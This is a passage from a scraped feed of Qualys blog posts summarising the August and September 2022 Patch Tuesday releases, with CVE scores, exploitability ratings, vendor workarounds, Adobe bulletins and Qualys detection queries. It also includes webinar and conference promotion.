Advisories from August to September 2022 Patch Tuesday Advisory\n\n_Sorted in Descending Order_\n\n * [Microsoft Patches Vulnerabilities 79 including 16 Microsoft Edge (Chromium-Based); with 2 Zero-days and 5 Critical in Patch Tuesday September 2022 Edition](<https://threatprotect.qualys.com/2022/09/14/microsoft-patches-vulnerabilities-79-including-16-microsoft-edge-chromium-based-with-2-zero-days-and-5-critical-in-patch-tuesday-september-2022-edition/>)\n * [Google Chrome Releases Fix for the Zero-day Vulnerability 
(CVE-2022-3075)](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [Atlassian Bitbucket Server and Data Center Command Injection Vulnerability (CVE-2022-36804)](<https://threatprotect.qualys.com/2022/08/29/atlassian-bitbucket-server-and-data-center-command-injection-vulnerability-cve-2022-36804/>)\n * [GitLab Patches Critical Remote Command Execution Vulnerability (CVE-2022-2884)](<https://threatprotect.qualys.com/2022/08/25/gitlab-patches-critical-remote-command-execution-vulnerability-cve-2022-2884/>)\n * [Apple Releases Security Updates to patch two Zero-Day Vulnerabilities (CVE-2022-32893 and CVE-2022-32894)](<https://threatprotect.qualys.com/2022/08/18/apple-releases-security-updates-to-patch-two-zero-day-vulnerabilities-cve-2022-32893-and-cve-2022-32894/>)\n * [Google Chrome Zero-Day Insufficient Input Validation Vulnerability (CVE-2022-2856)](<https://threatprotect.qualys.com/2022/08/18/google-chrome-zero-day-insufficient-input-validation-vulnerability-cve-2022-2856/>)\n * [Palo Alto Networks (PAN-OS) Reflected Amplification Denial-of-Service (DoS) Vulnerability (CVE-2022-0028)](<https://threatprotect.qualys.com/2022/08/16/palo-alto-networks-pan-os-reflected-amplification-denial-of-service-dos-vulnerability-cve-2022-0028/>)\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, & 
CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91937` OR qid:`91938` OR qid:`91939` OR qid:`91940` OR qid:`91941` OR qid:`91942` OR qid:`91943` OR qid:`91944` OR qid:`91945` OR qid:`91946` OR qid:`91947` OR qid:`110415` OR qid:`110416` OR qid:`377590` ) \n\n\n\n [Qualys VMDR Recognized as Best VM Solution by SC Awards 2022 & Leader by GigaOm](<https://blog.qualys.com/product-tech/2022/08/22/qualys-vmdr-recognized-as-best-vm-solution-by-sc-awards-2022-leader-by-gigaom>) **_New_**\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>)\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches with one click.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91937` OR qid:`91938` OR qid:`91939` OR qid:`91940` OR qid:`91941` OR qid:`91942` OR qid:`91943` OR qid:`91944` OR qid:`91945` OR qid:`91946` OR qid:`91947` OR qid:`110415` OR qid:`110416` OR qid:`377590` ) \n\n\n\n [Let Smart Automation Reduce the Risk of Zero-Day Attacks on Third-Party Applications](<https://blog.qualys.com/qualys-insights/2022/09/08/let-smart-automation-reduce-the-risk-of-zero-day-attacks-on-third-party-applications-2>) **_New_**\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>)\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. 
_[Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs) and System Defined Controls (SDC)](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>) have been updated to support the Microsoft-recommended workarounds for this Patch Tuesday:\n\n#### [CVE-2022-38007](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38007>) | Azure Guest Configuration and Azure Arc-enabled Servers Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nPolicy Compliance Control IDs (CIDs) for Checking Azure Arc-Enabled Servers on Linux:\n\n * **14112**: Status of the services installed on the Linux/UNIX host (stopped, running, failed, dead, \u2026)\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-34718](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718>) | Windows TCP/IP Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **3720**: Status of the 'IPSEC Services' service\n * **14916**: Status of Windows Services\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n#### [CVE-2022-35838](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35838>) | HTTP V3 Denial of Service (DoS) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **24717**: Status of the 'HTTP/3' service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-33679](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33679>), 
[CVE-2022-33647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33647>) | Windows Kerberos Elevation of Privilege (EoP) Vulnerability\n\nThese vulnerabilities have a CVSSv3.1 score of 8.1/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **17108**: Status of the 'KDC support for claims, compound authentication and Kerberos armoring' setting (Enabled / Disabled)\n * **17109**: Status of the 'Kerberos client support for claims, compound authentication and Kerberos armoring' setting\n * **17197**: Status of the 'KDC support for claims, compound authentication, and Kerberos armoring' setting\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-38004](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38004>) | Windows Network File System Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **1161**: Status of the 'Fax' service\n * **14916**: Status of Windows Services\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1161` OR id:`3720` OR id:`14112` OR id:`14916` OR id:`14916` OR id:`17108` OR id:`17108` OR id:`17109` OR id:`17109` OR id:`17197` OR id:`17197` OR id:`24717` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>) **_New_**\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n**Patch Tuesday is Complete.**\n\n* * *\n\n# Qualys [This Month in Vulnerabilities and 
Patches](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>) Webinar Series\n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities.\n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management.\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n* * *\n\n## NEW & NOTEWORTHY UPCOMING EVENTS\n\nThe content within this section will spotlight Vulnerability Management, Patch Management, Threat Protections, and Policy Compliance adjacent events available to our new and existing customers.\n\n* * *\n\n[WEBINARS](<https://gateway.on24.com/wcc/eh/3347108/category/91385/upcoming-webinars>)\n\n## [Introducing Qualys Threat Thursdays](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/01/introducing-qualys-threat-research-thursdays>)\n\n\n\nThe **Qualys Research Team** announces the first in a series of regular monthly webinars covering the latest threat intelligence analysis and insight. 
Join us each month for Threat Thursdays, where we will zero in on a specific malware or other exploit observed in the wild\u2026 and how to defend against it.\n\nPlease join us for the first [Threat Thursdays](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar where the Qualys Threat Research Team will present the latest threat intelligence\u2026 each and every month! \n\nTo quickly navigate to Threat Thursday blog posts, please use <https://blog.qualys.com/tag/threat-thursday>\n\n* * *\n\n[CONFERENCES](<https://www.qualys.com/qsc/locations/>)\n\n[](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821>)[Register Now](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821>)\n\n## [Qualys Annual Security Conference](<https://www.qualys.com/qsc/get-notified/#las-vegas/>) #QSC22\n\nNovember 7-10, 2022 \n\nThe Venetian Resort Las Vegas, 3355 Las Vegas Blvd. 
South, Las Vegas, NV 89109, US\n\n[Book your hotel here](<https://book.passkey.com/gt/218594637?gtid=9914abda1b2fe722d872e0ac3e0bdc09>) & take advantage of the discounted QSC rate of $229+ per night\n\nOr find a conference [near you](<https://www.qualys.com/qsc/locations/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T20:00:00", "type": "qualysblog", "title": "September 2022 Patch Tuesday | Microsoft Releases 63 Vulnerabilities with 5 Critical, plus 16 Microsoft Edge (Chromium-Based); Adobe Releases 7 Advisories, 63 Vulnerabilities with 35 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0028", "CVE-2022-22047", "CVE-2022-23960", "CVE-2022-26929", "CVE-2022-2856", "CVE-2022-2884", "CVE-2022-30134", "CVE-2022-3075", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-33647", "CVE-2022-33679", "CVE-2022-34718", "CVE-2022-34721", "CVE-2022-34722", "CVE-2022-35838", "CVE-2022-36804", "CVE-2022-37969", "CVE-2022-38004", "CVE-2022-38007", "CVE-2022-38009", "CVE-2022-38012"], "modified": 
"2022-09-13T20:00:00", "id": "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T00:03:27", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 121 vulnerabilities (aka flaws) in the August 2022 update, including 17 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP) and Remote Code Execution (RCE). This month's Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited* in attacks ([CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>)*, [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)). Earlier this month, August 5, 2022, Microsoft also released 20 Microsoft Edge (Chromium-Based) updates addressing Elevation of Privilege (EoP), Remote Code Execution (RCE), and Security Feature Bypass with severities of Low, Moderate, and Important respectively.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Spoofing.\n\n## **The August 2022 Microsoft vulnerabilities are classified as follows:**\n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n\n# **Notable Microsoft Vulnerabilities Patched**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) | 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nIn May, Microsoft released a [blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) giving guidance for a vulnerability in MSDT and released updates to address it shortly thereafter. Public discussion of a vulnerability can encourage further scrutiny on the component, both by Microsoft security personnel as well as their research partners. _This CVE is a variant of the vulnerability publicly known as Dogwalk._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n>  Qualys director of vulnerability and threat research, [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), said DogWalk had actually been reported back in 2019 but at the time was not thought to be dangerous as it required \u201csignificant user interaction to exploit,\u201d and there were other mitigations in place.\n> \n> - _Excerpt from [Surge in CVEs as Microsoft Fixes Exploited Zero Day Bug](<https://www.infosecurity-magazine.com/news/surge-cves-microsoft-fixes/>)_\n\n* * *\n\n### [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.6/10.\n\nThis vulnerability requires that a user with an affected version of Exchange Server access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. 
For more information, see [Exchange Server Support for Windows Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) and/or [The Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Unlikely_**\n\n* * *\n\n## **Security Feature Bypass Vulnerabilities Addressed**\n\nThese are **standalone security updates**. These packages must be installed in addition to the normal security updates to be protected from these vulnerabilities.\n\nThese security updates have a Servicing Stack Update prerequisite for specific KB numbers. The packages have built-in prerequisite logic to ensure the ordering.\n\nMicrosoft customers should ensure they have installed the latest Servicing Stack Update before installing these standalone security updates. 
See [ADV990001 | Latest Servicing Stack Updates](<https://msrc.microsoft.com/update-guide/security-guidance/advisory/ADV990001>) for more information.\n\nAn attacker who successfully exploited any of these three (3) vulnerabilities could bypass Secure Boot.\n\n### CERT/CC: [CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) Eurosoft Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) New Horizon Data Systems Inc Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) Crypto Pro Boot Loader Bypass\n\nAt the time of publication, a CVSSv3.1 score has not been assigned.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Exchange Server, Microsoft Office, System Center, and Windows.\n\nA total of 86 unique Microsoft products/versions are affected, including .NET, Azure, Edge (Chromium-based), Excel, Exchange Server (Cumulative Update), Microsoft 365 Apps for Enterprise, Office, Open Management Infrastructure, Outlook, System Center Operations Manager (SCOM), Visual Studio, Windows Desktop, and Windows Server.\n\nDownloads include IE Cumulative, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>), 
[CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution (RCE) Vulnerability\n\nThese vulnerabilities have a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nAn unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>), [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability\n\nThese vulnerabilities have a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port, thus rendering the vulnerability unexploitable. **Warning**: Disabling Port 1723 could affect communications over your network.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\n
An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.\n\nPlease see [Certificate-based authentication changes on Windows domain controllers](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>) for more information and ways to protect your domain.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-33646](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.0/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in August, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>), and [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. 
It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.6/10.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nThe user would have to click on a specially crafted URL to be compromised by the attacker.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThese vulnerabilities have a CVSSv3.1 score of 8.3/10. _[Per Microsoft's severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. 
The CVSS scoring system doesn't allow for this type of nuance._\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 25 vulnerabilities affecting Adobe Acrobat and Reader, Commerce, FrameMaker, Illustrator, and Premiere Elements applications. Of these 25 vulnerabilities, 15 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, ranging in severity from a CVSS score of 7.8/10 to 9.1/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-38](<https://helpx.adobe.com/security/products/magento/apsb22-38.html>) | Security update available for Adobe Commerce\n\nThis update resolves seven (7) vulnerabilities:\n\n * Four (4) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * One (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. 
This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>), [important](<https://helpx.adobe.com/security/severity-ratings.html>), and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, privilege escalation, and security feature bypass.\n\n* * *\n\n### [APSB22-39](<https://helpx.adobe.com/security/products/acrobat/apsb22-39.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves seven (7) vulnerabilities:\n\n * Three (3) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Four (4) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-41](<https://helpx.adobe.com/security/products/illustrator/apsb22-41.html>) | Security Updates Available for Adobe Illustrator\n\nThis update resolves four (4) vulnerabilities:\n\n * Two (2) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. 
This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/framemaker/apsb22-42.html>) | Security update available for Adobe FrameMaker\n\nThis update resolves six (6) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-43](<https://helpx.adobe.com/security/products/premiere_elements/apsb22-43.html>) | Security update available for Adobe Premiere Elements\n\nThis update resolves one (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. 
\n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories for August 1-9, 2022 _New Content_\n\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, & CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n * [Cisco Patched Small Business RV Series Routers Multiple Vulnerabilities (CVE-2022-20827, CVE-2022-20841, and CVE-2022-20842)](<https://threatprotect.qualys.com/2022/08/04/cisco-patched-small-business-rv-series-routers-multiple-vulnerabilities-cve-2022-20827-cve-2022-20841-and-cve-2022-20842/>)\n * [VMware Patched Multiple Vulnerabilities in VMware Products including Identity Manager (vIDM) and Workspace ONE 